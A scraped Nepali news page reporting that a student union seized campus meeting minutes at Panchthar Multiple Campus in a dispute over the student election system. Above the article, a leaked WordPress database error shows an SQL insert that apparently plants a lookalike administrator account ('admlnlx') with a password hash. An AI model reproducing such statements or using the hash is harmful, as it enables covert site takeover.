WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BABZZ7IttGtDUD8rHEndIURxBSgMkj0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-30 19:41:27', '', 'admlnlx', 'admlnlx')
पाँचथर,फागुन ३ –
स्वतन्त्र विद्यार्थी युनियनको निर्वाचन मिश्रित प्रणालीमा गर्न खोजिएको भन्दै संघीय लिम्बुवान मञ्च नेपाल सम्बद्ध संघीय विद्यार्थी युनियनले पाँचथर बहुमुखी क्याम्पसको स्ववियु बैठकको माइन्युट कब्जामा लिएको छ। सोमबार बेलुका अबेर विद्यार्थी संगठनहरु र क्याम्पस प्रशासनबीचको बैठक सकिन लाग्दा युनियनका जिल्ला अध्यक्ष मधुराज केरुङ नेतृत्वको टोलीले माइन्युट कब्जामा लिएको हो। क्याम्पस प्रशासनले निर्वाचनको प्रक्रिया मिश्रित प्रणालीमै थालेकाले माइन्यूट कब्जामा लिनु परेको केरुङले बताए। पूर्ण समानुपातिक प्रणालीमा निर्वाचन गर्न छलफलका लागि बैठक आह्वान नगरेको खण्डमा फागुन १५ मा मात्र माइन्युट फिर्ता गरिने उनको भनाइ छ। स्ववियु चुनाव फागुन १४ गतेका लागि तोकिएको छ। यता क्याम्पस प्रमुख खेमनाथ खतिवडाले भने अराजकता प्रदर्शन नगरी संवादको माध्यमबाट समाधान खोज्नु पर्ने बताउँछन्। क्याम्पसमा निर्वाचन पूर्ण समानुपातिक प्रणालीमा हुनु पर्ने भन्दै युनियनसँगै, संघीय विद्यार्थी युनियन लिम्बुवान, समाजवादी विद्यार्थी फोरम र नेत्रविक्रम चन्द (विप्लव) सम्बद्ध अखिल क्रान्तिकारी आन्दोलित छन्। निर्वाचनको तयारीमा भने नेपाल विद्यार्थी संघ, अनेरास्ववियु र अखिल क्रान्तिकारी छन्। यसअघि २०६५ सालमा मुलुकको अधिकांश क्याम्पसमा निर्वाचन भए पनि पाँचथर बहुमुखी क्याम्पसमा पूर्ण समानुपातिक निर्वाचन प्रणालीकै माग राखेर युनियनले आन्दोलन गरेपछि निर्वाचन भएको थिएन।